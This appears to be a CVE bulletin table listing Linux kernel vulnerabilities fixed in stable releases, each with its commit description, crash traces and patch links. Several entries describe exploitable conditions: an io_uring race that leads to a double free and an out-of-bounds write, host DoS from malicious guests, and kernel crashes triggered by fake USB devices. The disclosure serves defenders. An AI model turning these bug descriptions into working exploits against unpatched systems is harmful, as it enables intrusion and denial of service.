| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ixgbevf: add missing negotiate_features op to Hyper-V ops table Commit a7075f501bd3 ("ixgbevf: fix mailbox API compatibility by negotiating supported features") added the .negotiate_features callback to ixgbe_mac_operations and populated it in ixgbevf_mac_ops, but forgot to add it to ixgbevf_hv_mac_ops. This leaves the function pointer NULL on Hyper-V VMs. During probe, ixgbevf_negotiate_api() calls ixgbevf_set_features(), which unconditionally dereferences hw->mac.ops.negotiate_features(). On Hyper-V this results in a NULL pointer dereference: BUG: kernel NULL pointer dereference, address: 0000000000000000 [...] Hardware name: Microsoft Corporation Virtual Machine/Virtual Machine [...] Workqueue: events work_for_cpu_fn RIP: 0010:0x0 [...] Call Trace: ixgbevf_negotiate_api+0x66/0x160 [ixgbevf] ixgbevf_sw_init+0xe4/0x1f0 [ixgbevf] ixgbevf_probe+0x20f/0x4a0 [ixgbevf] local_pci_probe+0x50/0xa0 work_for_cpu_fn+0x1a/0x30 [...] Add ixgbevf_hv_negotiate_features_vf() that returns -EOPNOTSUPP and wire it into ixgbevf_hv_mac_ops. The caller already handles -EOPNOTSUPP gracefully. | 2026-05-06 | not yet calculated | CVE-2026-43094 | https://git.kernel.org/stable/c/d8a747057a17ffc79e31df1abb11d05e1669d8e5 https://git.kernel.org/stable/c/2270ebab53128fb73c4a70a292be09094074737f https://git.kernel.org/stable/c/4db7b61ec1d1b2b67c0881b62fc4f9583bc21484 https://git.kernel.org/stable/c/1455ff8809843e6e83f1f5b5c0bcc2224c99a3cb https://git.kernel.org/stable/c/4821d563cd7f251ae728be1a6d04af82a294a5b9 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ASoC: SDCA: Fix errors in IRQ cleanup IRQs are enabled through sdca_irq_populate() from component probe using devm_request_threaded_irq(); this however means the IRQs can persist if the sound card is torn down. Some of the IRQ handlers store references to the card and the kcontrols which can then fail. Some detail of the crash was explained in [1]. Generally it is not advised to use devm outside of bus probe, so the code is updated to not use devm. The IRQ requests are not moved to bus probe time as it makes passing the snd_soc_component into the IRQs very awkward and would then require a second step once the component is available, so it is simpler to just register the IRQs at this point, even though that necessitates some manual cleanup. | 2026-05-06 | not yet calculated | CVE-2026-43095 | https://git.kernel.org/stable/c/b022da127bd9d2217e8f285e643caf5aff6f7f14 https://git.kernel.org/stable/c/4e53116437e919c4b9a9d95fb73ae14fe0cfc8f9 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mshv: Fix infinite fault loop on permission-denied GPA intercepts Prevent infinite fault loops when guests access memory regions without proper permissions. Currently, mshv_handle_gpa_intercept() attempts to remap pages for all faults on movable memory regions, regardless of whether the access type is permitted. When a guest writes to a read-only region, the remap succeeds but the region remains read-only, causing immediate re-fault and spinning the vCPU indefinitely. Validate intercept access type against region permissions before attempting remaps. Reject writes to non-writable regions and executes to non-executable regions early, returning false to let the VMM handle the intercept appropriately. This also closes a potential DoS vector where malicious guests could intentionally trigger these fault loops to consume host resources. | 2026-05-06 | not yet calculated | CVE-2026-43096 | https://git.kernel.org/stable/c/02226839079ccc558820a3b25c4c46812927b4ba https://git.kernel.org/stable/c/16cbec24897624051b324aa3a85859c38ca65fde |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: PCI: hv: Fix double ida_free in hv_pci_probe error path If hv_pci_probe() fails after storing the domain number in hbus->bridge->domain_nr, there is a call to free this domain_nr via pci_bus_release_emul_domain_nr(), however, during cleanup, the bridge release callback pci_release_host_bridge_dev() also frees the domain_nr causing ida_free to be called on same ID twice and triggering following warning: ida_free called for id=28971 which is not allocated. WARNING: lib/idr.c:594 at ida_free+0xdf/0x160, CPU#0: kworker/0:2/198 Call Trace: pci_bus_release_emul_domain_nr+0x17/0x20 pci_release_host_bridge_dev+0x4b/0x60 device_release+0x3b/0xa0 kobject_put+0x8e/0x220 devm_pci_alloc_host_bridge_release+0xe/0x20 devres_release_all+0x9a/0xd0 device_unbind_cleanup+0x12/0xa0 really_probe+0x1c5/0x3f0 vmbus_add_channel_work+0x135/0x1a0 Fix this by letting pci core handle the free domain_nr and remove the explicit free called in pci-hyperv driver. | 2026-05-06 | not yet calculated | CVE-2026-43097 | https://git.kernel.org/stable/c/21bc8e0ba5c2a081b0a2808c976d4c9dbddf1e48 https://git.kernel.org/stable/c/b6422dff0e518245019233432b6bccfc30b73e2f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: nfc: s3fwrn5: allocate rx skb before consuming bytes s3fwrn82_uart_read() reports the number of accepted bytes to the serdev core. The current code consumes bytes into recv_skb and may already deliver a complete frame before allocating a fresh receive buffer. If that alloc_skb() fails, the callback returns 0 even though it has already consumed bytes, and it leaves recv_skb as NULL for the next receive callback. That breaks the receive_buf() accounting contract and can also lead to a NULL dereference on the next skb_put_u8(). Allocate the receive skb lazily before consuming the next byte instead. If allocation fails, return the number of bytes already accepted. | 2026-05-06 | not yet calculated | CVE-2026-43098 | https://git.kernel.org/stable/c/d8c2aa3c4a1ec530a485e46a1c4f1a118bb00156 https://git.kernel.org/stable/c/7c31f7a599cf00fad3c204092a91a924126c67e4 https://git.kernel.org/stable/c/6d931680a9851481c3243689488eafed08eeff71 https://git.kernel.org/stable/c/09822d3d6f68a0cdc4626e0c507324a4927f55a9 https://git.kernel.org/stable/c/5c14a19d5b1645cce1cb1252833d70b23635b632 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: bridge: guard local VLAN-0 FDB helpers against NULL vlan group When CONFIG_BRIDGE_VLAN_FILTERING is not set, br_vlan_group() and nbp_vlan_group() return NULL (br_private.h stub definitions). The BR_BOOLOPT_FDB_LOCAL_VLAN_0 toggle code is compiled unconditionally and reaches br_fdb_delete_locals_per_vlan_port() and br_fdb_insert_locals_per_vlan_port(), where the NULL vlan group pointer is dereferenced via list_for_each_entry(v, &vg->vlan_list, vlist). The observed crash is in the delete path, triggered when creating a bridge with IFLA_BR_MULTI_BOOLOPT containing BR_BOOLOPT_FDB_LOCAL_VLAN_0 via RTM_NEWLINK. The insert helper has the same bug pattern. Oops: general protection fault, probably for non-canonical address 0xdffffc0000000056: 0000 [#1] KASAN NOPTI KASAN: null-ptr-deref in range [0x00000000000002b0-0x00000000000002b7] RIP: 0010:br_fdb_delete_locals_per_vlan+0x2b9/0x310 Call Trace: br_fdb_toggle_local_vlan_0+0x452/0x4c0 br_toggle_fdb_local_vlan_0+0x31/0x80 net/bridge/br.c:276 br_boolopt_toggle net/bridge/br.c:313 br_boolopt_multi_toggle net/bridge/br.c:364 br_changelink net/bridge/br_netlink.c:1542 br_dev_newlink net/bridge/br_netlink.c:1575 Add NULL checks for the vlan group pointer in both helpers, returning early when there are no VLANs to iterate. This matches the existing pattern used by other bridge FDB functions such as br_fdb_add() and br_fdb_delete(). | 2026-05-06 | not yet calculated | CVE-2026-43100 | https://git.kernel.org/stable/c/fb612d436ff0317659e45a91c25fd7d9516f5b1b https://git.kernel.org/stable/c/ddf0ec2d600e7dad62b89692749534d7900a732a https://git.kernel.org/stable/c/1979645e1842cb7017525a61a0e0e0beb924d02a |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: airoha: Fix memory leak in airoha_qdma_rx_process() If an error occurs on the subsequent buffers belonging to the non-linear part of the skb (e.g. due to an error in the payload length reported by the NIC or if we consumed all the available fragments for the skb), the page_pool fragment will not be linked to the skb, so it will not return to the pool in the airoha_qdma_rx_process() error path. Fix the memory leak by partially reverting commit 'd6d2b0e1538d ("net: airoha: Fix page recycling in airoha_qdma_rx_process()")' and always running the page_pool_put_full_page routine in the airoha_qdma_rx_process() error path. | 2026-05-06 | not yet calculated | CVE-2026-43102 | https://git.kernel.org/stable/c/4429b761874fb9c7767d12d98913a467ef2654f1 https://git.kernel.org/stable/c/7ee0063fbab8aea8f4e4e3165f541bf898b77b80 https://git.kernel.org/stable/c/285fa6b1e03cff78ead0383e1b259c44b95faf90 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: lapbether: handle NETDEV_PRE_TYPE_CHANGE lapbeth_data_transmit() expects the underlying device type to be ARPHRD_ETHER. Returning NOTIFY_BAD from lapbeth_device_event() makes sure the bonding driver cannot break this expectation. | 2026-05-06 | not yet calculated | CVE-2026-43103 | https://git.kernel.org/stable/c/363a38044b8cd5b496d241651a1fb666e7c5fe3e https://git.kernel.org/stable/c/328bb2cff5c2ed973f595ded769e15f4b7a117be https://git.kernel.org/stable/c/63851f60781aa89258c8f0952cd13940aab0888e https://git.kernel.org/stable/c/b117056768ab7deb434e7d72065e48d2083a0c2a https://git.kernel.org/stable/c/b120e4432f9f56c7103133d6a11245e617695adb |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/vc4: Fix a memory leak in hang state error path When vc4_save_hang_state() encounters an early return condition, it returns without freeing the previously allocated `kernel_state`, leaking memory. Add the missing kfree() calls by consolidating the early return paths into a single place. | 2026-05-06 | not yet calculated | CVE-2026-43104 | https://git.kernel.org/stable/c/dd5c49787a32da96a2b154427eb17cbf12a83c28 https://git.kernel.org/stable/c/d8fdd6adc07b78ad3e9ee0004876d90cb59ca941 https://git.kernel.org/stable/c/e352e9adc9f6df54d63150ff832f71c04e30744b https://git.kernel.org/stable/c/3eb7dd55021d0f4308fbea0bea21d2118984d8e7 https://git.kernel.org/stable/c/9525d169e5fd481538cf8c663cc5839e54f2e481 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/vc4: Fix memory leak of BO array in hang state The hang state's BO array is allocated separately with kzalloc() in vc4_save_hang_state() but never freed in vc4_free_hang_state(). Add the missing kfree() for the BO array before freeing the hang state struct. | 2026-05-06 | not yet calculated | CVE-2026-43105 | https://git.kernel.org/stable/c/a812008fe3a0aebb778d277b35717f64e23d0302 https://git.kernel.org/stable/c/0d3c014a84396a147705f523a8fd6fc873e76502 https://git.kernel.org/stable/c/421cea4f71f7cf65abaae878562ee4aa2b684628 https://git.kernel.org/stable/c/b8138567c4a80fd76a647849ebd4284996cf4b17 https://git.kernel.org/stable/c/f4dfd6847b3e5d24e336bca6057485116d17aea4 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: xfrm: account XFRMA_IF_ID in aevent size calculation xfrm_get_ae() allocates the reply skb with xfrm_aevent_msgsize(), then build_aevent() appends attributes including XFRMA_IF_ID when x->if_id is set. xfrm_aevent_msgsize() does not include space for XFRMA_IF_ID. For states with if_id, build_aevent() can fail with -EMSGSIZE and hit BUG_ON(err < 0) in xfrm_get_ae(), turning a malformed netlink interaction into a kernel panic. Account XFRMA_IF_ID in the size calculation unconditionally and replace the BUG_ON with normal error unwinding. | 2026-05-06 | not yet calculated | CVE-2026-43107 | https://git.kernel.org/stable/c/2c41283d94af943a05f7f2cc1a01f0c872f3cf43 https://git.kernel.org/stable/c/e62e322ea20be78e346e4b49f9a6b9f03313af4c https://git.kernel.org/stable/c/58e5735d1a5373652f405a0c16e54ac04aaab0ad https://git.kernel.org/stable/c/7081d46d32312f1a31f0e0e99c6835a394037599 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: soc: qcom: pd-mapper: Fix element length in servreg_loc_pfr_req_ei It looks like the element length declared in servreg_loc_pfr_req_ei for reason does not match servreg_loc_pfr_req's reason field, due to which we could observe a decoding error on PD crash. qmi_decode_string_elem: String len 81 >= Max Len 65 Fix this by matching it with servreg_loc_pfr_req's reason field. | 2026-05-06 | not yet calculated | CVE-2026-43108 | https://git.kernel.org/stable/c/c93ca7c5a72e23a83a0b96f7f5c41a7a72f1dc47 https://git.kernel.org/stable/c/7d75145672cf2ec7c5417e3243af72c48314f7bb https://git.kernel.org/stable/c/cba84132c2ac7c08b215ce4962bc6f522c08a88c https://git.kernel.org/stable/c/641f6fda143b879da1515f821ee475073678cf2a |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: x86: shadow stacks: proper error handling for mmap lock 김영민 reports that shstk_pop_sigframe() doesn't check for errors from mmap_read_lock_killable(), which is a silly oversight, and also shows that we haven't marked those functions with "__must_check", which would have immediately caught it. So let's fix both issues. | 2026-05-06 | not yet calculated | CVE-2026-43109 | https://git.kernel.org/stable/c/c64cebcc5c4f223dbcbe7dcdf74908fc092a0aa4 https://git.kernel.org/stable/c/262b6d38a81d51b135db81e1f30c13d30e38feee https://git.kernel.org/stable/c/52f657e34d7b21b47434d9d8b26fa7f6778b63a0 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: srcu: Use irq_work to start GP in tiny SRCU Tiny SRCU's srcu_gp_start_if_needed() directly calls schedule_work(), which acquires the workqueue pool->lock. This causes a lockdep splat when call_srcu() is called with a scheduler lock held, due to: call_srcu() [holding pi_lock] srcu_gp_start_if_needed() schedule_work() -> pool->lock workqueue_init() / create_worker() [holding pool->lock] wake_up_process() -> try_to_wake_up() -> pi_lock Also add irq_work_sync() to cleanup_srcu_struct() to prevent a use-after-free if a queued irq_work fires after cleanup begins. Tested with rcutorture SRCU-T and no lockdep warnings. [ Thanks to Boqun for similar fix in patch "rcu: Use an intermediate irq_work to start process_srcu()" ] | 2026-05-06 | not yet calculated | CVE-2026-43115 | https://git.kernel.org/stable/c/bb37286db65368cb72ba8757ad86299c4e4a73fc https://git.kernel.org/stable/c/a6fc88b22bc8d12ad52e8412c667ec0f5bf055af |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: btrfs: fix zero size inode with non-zero size after log replay When logging that an inode exists, as part of logging a new name or logging new dir entries for a directory, we always set the generation of the logged inode item to 0. This is to signal during log replay (in overwrite_item()), that we should not set the i_size since we only logged that an inode exists, so the i_size of the inode in the subvolume tree must be preserved (as when we log new names or that an inode exists, we don't log extents). This works fine except when we have already logged an inode in full mode or it's the first time we are logging an inode created in a past transaction, that inode has a new i_size of 0 and then we log a new name for the inode (due to a new hardlink or a rename), in which case we log an i_size of 0 for the inode and a generation of 0, which causes the log replay code to not update the inode's i_size to 0 (in overwrite_item()). An example scenario: mkdir /mnt/dir xfs_io -f -c "pwrite 0 64K" /mnt/dir/foo sync xfs_io -c "truncate 0" -c "fsync" /mnt/dir/foo ln /mnt/dir/foo /mnt/dir/bar xfs_io -c "fsync" /mnt/dir <power fail> After log replay the file remains with a size of 64K. This is because when we first log the inode, when we fsync file foo, we log its current i_size of 0, and then when we create a hard link we log again the inode in exists mode (LOG_INODE_EXISTS) but we set a generation of 0 for the inode item we add to the log tree, so during log replay overwrite_item() sees that the generation is 0 and i_size is 0 so we skip updating the inode's i_size from 64K to 0. Fix this by making sure at fill_inode_item() we always log the real generation of the inode if it was logged in the current transaction with the i_size we logged before. Also if an inode created in a previous transaction is logged in exists mode only, make sure we log the i_size stored in the inode item located from the commit root, so that if we log multiple times that the inode exists we get the correct i_size. A test case for fstests will follow soon. | 2026-05-06 | not yet calculated | CVE-2026-43118 | https://git.kernel.org/stable/c/fddb157536e67a055597f00a8b4922d5f5ed0826 https://git.kernel.org/stable/c/03e966b63df5b06790310c1faaf3e0cb43adea8b https://git.kernel.org/stable/c/5254d4181add9dfaa5e3519edd71cc8f752b2f85 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: Bluetooth: hci_sync: annotate data-races around hdev->req_status __hci_cmd_sync_sk() sets hdev->req_status under hdev->req_lock: hdev->req_status = HCI_REQ_PEND; However, several other functions read or write hdev->req_status without holding any lock: - hci_send_cmd_sync() reads req_status in hci_cmd_work (workqueue) - hci_cmd_sync_complete() reads/writes from HCI event completion - hci_cmd_sync_cancel() / hci_cmd_sync_cancel_sync() read/write - hci_abort_conn() reads in connection abort path Since __hci_cmd_sync_sk() runs on hdev->req_workqueue while hci_send_cmd_sync() runs on hdev->workqueue, these are different workqueues that can execute concurrently on different CPUs. The plain C accesses constitute a data race. Add READ_ONCE()/WRITE_ONCE() annotations on all concurrent accesses to hdev->req_status to prevent potential compiler optimizations that could affect correctness (e.g., load fusing in the wait_event condition or store reordering). | 2026-05-06 | not yet calculated | CVE-2026-43119 | https://git.kernel.org/stable/c/6e539907c0d11f514c5e0b049b27b04dff48a5b1 https://git.kernel.org/stable/c/a7a1cdb4a64ca74eb95cc46648fccb8cd3f9af27 https://git.kernel.org/stable/c/40734ce8efc34c4a0d0222855798c0dc14b65f2e https://git.kernel.org/stable/c/b6807cfc195ef99e1ac37b2e1e60df40295daa8c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: io_uring/zcrx: fix user_ref race between scrub and refill paths The io_zcrx_put_niov_uref() function uses a non-atomic check-then-decrement pattern (atomic_read followed by separate atomic_dec) to manipulate user_refs. This is serialized against other callers by rq_lock, but io_zcrx_scrub() modifies the same counter with atomic_xchg() WITHOUT holding rq_lock. On SMP systems, the following race exists: CPU0 (refill, holds rq_lock) CPU1 (scrub, no rq_lock) put_niov_uref: atomic_read(uref) - 1 // window opens atomic_xchg(uref, 0) - 1 return_niov_freelist(niov) [PUSH #1] // window closes atomic_dec(uref) - wraps to -1 returns true return_niov(niov) return_niov_freelist(niov) [PUSH #2: DOUBLE-FREE] The same niov is pushed to the freelist twice, causing free_count to exceed nr_iovs. Subsequent freelist pushes then perform an out-of-bounds write (a u32 value) past the kvmalloc'd freelist array into the adjacent slab object. Fix this by replacing the non-atomic read-then-dec in io_zcrx_put_niov_uref() with an atomic_try_cmpxchg loop that atomically tests and decrements user_refs. This makes the operation safe against concurrent atomic_xchg from scrub without requiring scrub to acquire rq_lock. [pavel: removed a warning and a comment] | 2026-05-06 | not yet calculated | CVE-2026-43121 | https://git.kernel.org/stable/c/a94f096e28bfc7975163a6b80f1c8f323efe317a https://git.kernel.org/stable/c/485dc691257b96e6d3bdc25b0eff2daadcc5c46c https://git.kernel.org/stable/c/003049b1c4fb8aabb93febb7d1e49004f6ad653b |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ACPI: processor: Update cpuidle driver check in __acpi_processor_start() Commit 7a8c994cbb2d ("ACPI: processor: idle: Optimize ACPI idle driver registration") moved the ACPI idle driver registration to acpi_processor_driver_init() and acpi_processor_power_init() does not register an idle driver any more. Accordingly, the cpuidle driver check in __acpi_processor_start() needs to be updated to avoid calling acpi_processor_power_init() without a cpuidle driver, in which case the registration of the cpuidle device in that function would lead to a NULL pointer dereference in __cpuidle_register_device(). | 2026-05-06 | not yet calculated | CVE-2026-43122 | https://git.kernel.org/stable/c/68f38f648e4b5bed2aeadd2f711e25302e6490f8 https://git.kernel.org/stable/c/6cfed39c2ce64ac024bbde458a9727105e0b8c66 https://git.kernel.org/stable/c/0089ce1c056aee547115bdc25c223f8f88c08498 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: fbcon: check return value of con2fb_acquire_newinfo() If fbcon_open() fails when called from con2fb_acquire_newinfo() then the info->fbcon_par pointer remains NULL and is later dereferenced. Add a check for the return value of the function con2fb_acquire_newinfo() to avoid it. Found by Linux Verification Center (linuxtesting.org) with SVACE. | 2026-05-06 | not yet calculated | CVE-2026-43123 | https://git.kernel.org/stable/c/d3e535533767c85788529e626478718b7e95a59f https://git.kernel.org/stable/c/3b5a754ec86bc6064af9aca76eb191c2405e6b0c https://git.kernel.org/stable/c/a785c4e2a999c2d51dfcf40d317cfb30cc735d2c https://git.kernel.org/stable/c/0b038c0be6827dd2dbb1ce4f8d92d97c80cbe9cc https://git.kernel.org/stable/c/11a93180a70bb3095a9bd80d113d9277e30d9959 https://git.kernel.org/stable/c/f57b61624c86ef8f87f6e6b7dd0755de03d90e89 https://git.kernel.org/stable/c/011a0502801c8536f64141a2b61362c14f456544 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: pstore: ram_core: fix incorrect success return when vmap() fails In persistent_ram_vmap(), vmap() may return NULL on failure. If offset is non-zero, adding offset_in_page(start) causes the function to return a non-NULL pointer even though the mapping failed. persistent_ram_buffer_map() therefore incorrectly returns success. Subsequent access to prz->buffer may dereference an invalid address and cause crashes. Add proper NULL checking for vmap() failures. | 2026-05-06 | not yet calculated | CVE-2026-43124 | https://git.kernel.org/stable/c/d47234840aeb4182ed3ee795c578b1dfa9cbd25b https://git.kernel.org/stable/c/49918dd52615097529811d21ec6074dd02ebe77c https://git.kernel.org/stable/c/8baa234181f632cabacf73e4834a910859e9fcc9 https://git.kernel.org/stable/c/1da904e84de608907662ad8a51ba9c571d61e003 https://git.kernel.org/stable/c/8d849adfbc3e98417fb541620568db1a759ef441 https://git.kernel.org/stable/c/2c99326dc1c79b7ce3c8dd92929b5ce724ff70eb https://git.kernel.org/stable/c/88d5b28f63c7aac1271784e3b800ed405d1cde75 https://git.kernel.org/stable/c/05363abc7625cf18c96e67f50673cd07f11da5e9 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ntfs3: fix circular locking dependency in run_unpack_ex Syzbot reported a circular locking dependency between wnd->rw_lock (sbi->used.bitmap) and ni->file.run_lock. The deadlock scenario: 1. ntfs_extend_mft() takes ni->file.run_lock then wnd->rw_lock. 2. run_unpack_ex() takes wnd->rw_lock then tries to acquire ni->file.run_lock inside ntfs_refresh_zone(). This creates an AB-BA deadlock. Fix this by using down_read_trylock() instead of down_read() when acquiring run_lock in run_unpack_ex(). If the lock is contended, skip ntfs_refresh_zone() - the MFT zone will be refreshed on the next MFT operation. This breaks the circular dependency since we never block waiting for run_lock while holding wnd->rw_lock. | 2026-05-06 | not yet calculated | CVE-2026-43127 | https://git.kernel.org/stable/c/b014372b62237521444ee51384549bdf48b79015 https://git.kernel.org/stable/c/b8d22d9d8260b0f4f4d8e2898c98037c9982ea66 https://git.kernel.org/stable/c/08ce2fee1b869ecbfbd94e0eb2630e52203a2e03 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ima: verify the previous kernel's IMA buffer lies in addressable RAM Patch series "Address page fault in ima_restore_measurement_list()", v3. When the second-stage kernel is booted via kexec with a limiting command line such as "mem=<size>" we observe a page fault. BUG: unable to handle page fault for address: ffff97793ff47000 RIP: ima_restore_measurement_list+0xdc/0x45a #PF: error_code(0x0000) not-present page This happens on x86_64 only, as this is already fixed in aarch64 in commit: cbf9c4b9617b ("of: check previous kernel's ima-kexec-buffer against memory bounds") This patch (of 3): When the second-stage kernel is booted with a limiting command line (e.g. "mem=<size>"), the IMA measurement buffer handed over from the previous kernel may fall outside the addressable RAM of the new kernel. Accessing such a buffer can fault during early restore. Introduce a small generic helper, ima_validate_range(), which verifies that a physical [start, end] range for the previous-kernel IMA buffer lies within addressable memory: - On x86, use pfn_range_is_mapped(). - On OF based architectures, use page_is_ram(). | 2026-05-06 | not yet calculated | CVE-2026-43129 | https://git.kernel.org/stable/c/f11d7d088f5ed54b31c6735854c12845eb60eb4a https://git.kernel.org/stable/c/9e1f51c1ad57cc76a0e8b5eb27038f8973fff4fa https://git.kernel.org/stable/c/5366ec7d2f793ce703c403d7fd4c25a3db365b9d https://git.kernel.org/stable/c/10d1c75ed4382a8e79874379caa2ead8952734f9 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: iommu/vt-d: Flush dev-IOTLB only when PCIe device is accessible in scalable mode Commit 4fc82cd907ac ("iommu/vt-d: Don't issue ATS Invalidation request when device is disconnected") relies on pci_dev_is_disconnected() to skip ATS invalidation for safely-removed devices, but it does not cover link-down caused by faults, which can still hard-lock the system. For example, if a VM fails to connect to the PCIe device, "virsh destroy" is executed to release resources and isolate the fault, but a hard-lockup occurs while releasing the group fd. Call Trace: qi_submit_sync qi_flush_dev_iotlb intel_pasid_tear_down_entry device_block_translation blocking_domain_attach_dev __iommu_attach_device __iommu_device_set_domain __iommu_group_set_domain_internal iommu_detach_group vfio_iommu_type1_detach_group vfio_group_detach_container vfio_group_fops_release __fput Although pci_device_is_present() is slower than pci_dev_is_disconnected(), it still takes only ~70 µs on a ConnectX-5 (8 GT/s, x2) and becomes even faster as PCIe speed and width increase. Besides, devtlb_invalidation_with_pasid() is called only in the paths below, which are far less frequent than memory map/unmap. 1. mm-struct release 2. {attach,release}_dev 3. set/remove PASID 4. dirty-tracking setup The gain in system stability far outweighs the negligible cost of using pci_device_is_present() instead of pci_dev_is_disconnected() to decide when to skip ATS invalidation, especially under GDR high-load conditions. | 2026-05-06 | not yet calculated | CVE-2026-43130 | https://git.kernel.org/stable/c/581ce094d9eafb78ec4f9de77bd24b780c151236 https://git.kernel.org/stable/c/e2c78c69f8faf2885ea4ceee08c71ac738f401a0 https://git.kernel.org/stable/c/ead67d0378e90f419e385a43af29435242d80c12 https://git.kernel.org/stable/c/01aed2f1d7cb8fdf4c60c5bb4727608cb82b401d https://git.kernel.org/stable/c/9813306610d0d718c863aaa70928bf57d7570ec0 https://git.kernel.org/stable/c/9deaacc8dcaddb6ddc5b52e1e63b457450ec0f94 https://git.kernel.org/stable/c/0da6697e577023d8867c7beb2d16a22510e4eea9 https://git.kernel.org/stable/c/10e60d87813989e20eac1f3eda30b3bae461e7f9 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/amd/pm: Fix null pointer dereference issue If SMU is disabled, during RAS initialization, there will be null pointer dereference issue here. | 2026-05-06 | not yet calculated | CVE-2026-43131 | https://git.kernel.org/stable/c/8e035505fa0e5b7c4306fd3f4e27f8e8f5bfad8c https://git.kernel.org/stable/c/1197366cca89a4c44c541ddedb8ce8bf0757993d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: dm-verity: correctly handle dm_bufio_client_create() failure If either of the calls to dm_bufio_client_create() in verity_fec_ctr() fails, then dm_bufio_client_destroy() is later called with an ERR_PTR() argument. That causes a crash. Fix this. | 2026-05-06 | not yet calculated | CVE-2026-43132 | https://git.kernel.org/stable/c/6283e49af87a9c121bb01e5a64a7fe5706c210bc https://git.kernel.org/stable/c/d3e1f1adc8a0289efe2d2cdc90edb8c6ffe0b5ef https://git.kernel.org/stable/c/5c2217ddb3b7e7ac25f4ebe9061258fc8f1c9167 https://git.kernel.org/stable/c/031f2adc1499b112a39ac316bbab3c80bba16cf2 https://git.kernel.org/stable/c/9b8dc1d327e2928f3da59ced0595d850d31c0936 https://git.kernel.org/stable/c/451cc650e40e8c3222d37877a9e4be0fcaacb9c8 https://git.kernel.org/stable/c/b154a868a3856fb5216c4f82981d8a503832e095 https://git.kernel.org/stable/c/119f4f04186fa4f33ee6bd39af145cdaff1ff17f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: cx23885: Add missing unmap in snd_cx23885_hw_params() In error path, add cx23885_alsa_dma_unmap() to release the resource acquired by cx23885_alsa_dma_map(). | 2026-05-06 | not yet calculated | CVE-2026-43135 | https://git.kernel.org/stable/c/fda46c9025b755ea50a969b960f333be62421b71 https://git.kernel.org/stable/c/0b7f56084cc3d7766bf274b71cd14cc9674b76bf https://git.kernel.org/stable/c/505630dd1ebf4b53d3f2866c057ddd93157a24d8 https://git.kernel.org/stable/c/544215cc37d032ccaf1919852c05e2439a4d7540 https://git.kernel.org/stable/c/9c0a6ff538660c36a98081916a24f08d55a91331 https://git.kernel.org/stable/c/9544b73cad4ee667fed6a60f71570c58a870a735 https://git.kernel.org/stable/c/fc4df593a8ffded2f77d69a73ecb51d364932ca5 https://git.kernel.org/stable/c/141c81849fab2ad4d6e3fdaff7cbaa873e8b5eb2 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: HID: logitech-hidpp: Check maxfield in hidpp_get_report_length() Do not crash when a report has no fields. Fake USB gadgets can send their own HID report descriptors and can define report structures without valid fields. This can be used to crash the kernel over USB. | 2026-05-06 | not yet calculated | CVE-2026-43136 | https://git.kernel.org/stable/c/ae81fac9ce81917817d787e6b74e68482d99bdf2 https://git.kernel.org/stable/c/2dc023dbc11b8dfa8afa63242762acd8cddcad03 https://git.kernel.org/stable/c/7f59999fcd699af06ad2aef446a635ea6aa87db3 https://git.kernel.org/stable/c/b74bf7d0d01fa9b53653f58c29aa00772121f6e9 https://git.kernel.org/stable/c/f1ceaaf93ea32d0f2b95c95f784ee155962c52ad https://git.kernel.org/stable/c/1acb28123e57b50d737377f400f57eec889fe5e4 https://git.kernel.org/stable/c/fb1725c0804dbec9dd01c4cb5c9f1f77a69e36dc https://git.kernel.org/stable/c/1547d41f9f19d691c2c9ce4c29f746297baef9e9 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ASoC: SOF: Intel: hda: Fix NULL pointer dereference If there's a mismatch between the DAI links in the machine driver and the topology, it is possible that the playback/capture widget is not set, especially in the case of loopback capture for echo reference where we use the dummy DAI link. Return the error when the widget is not set to avoid a null pointer dereference like below when the topology is broken. RIP: 0010:hda_dai_get_ops.isra.0+0x14/0xa0 [snd_sof_intel_hda_common] | 2026-05-06 | not yet calculated | CVE-2026-43137 | https://git.kernel.org/stable/c/10411f1f2c76be67103b1f95822ff629aa25e2aa https://git.kernel.org/stable/c/42068f7dd42b559c4eeae645e1455ff36518866a https://git.kernel.org/stable/c/7750d78b4014902bc0ac03d4bb30faa076a913ab https://git.kernel.org/stable/c/16c589567a956d46a7c1363af3f64de3d420af20 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: reset: gpio: suppress bind attributes in sysfs This is a special device that's created dynamically and is supposed to stay in memory forever. We also currently don't have a devlink between it and the actual reset consumer. Suppress sysfs bind attributes so that user-space can't unbind the device because - as of now - it will cause a use-after-free splat from any user that puts the reset control handle. | 2026-05-06 | not yet calculated | CVE-2026-43138 | https://git.kernel.org/stable/c/09d6efc6abd42809956d598906c222ccd1c8ae92 https://git.kernel.org/stable/c/76801c3dfca0ac6339a23e9615b5f23e25b8644c https://git.kernel.org/stable/c/1d7d869f074f98c34fe23f6a56e5f3acc1f95a2b https://git.kernel.org/stable/c/16de4c6a8fe9ff497ca1aba33ef0dbee09f11952 |
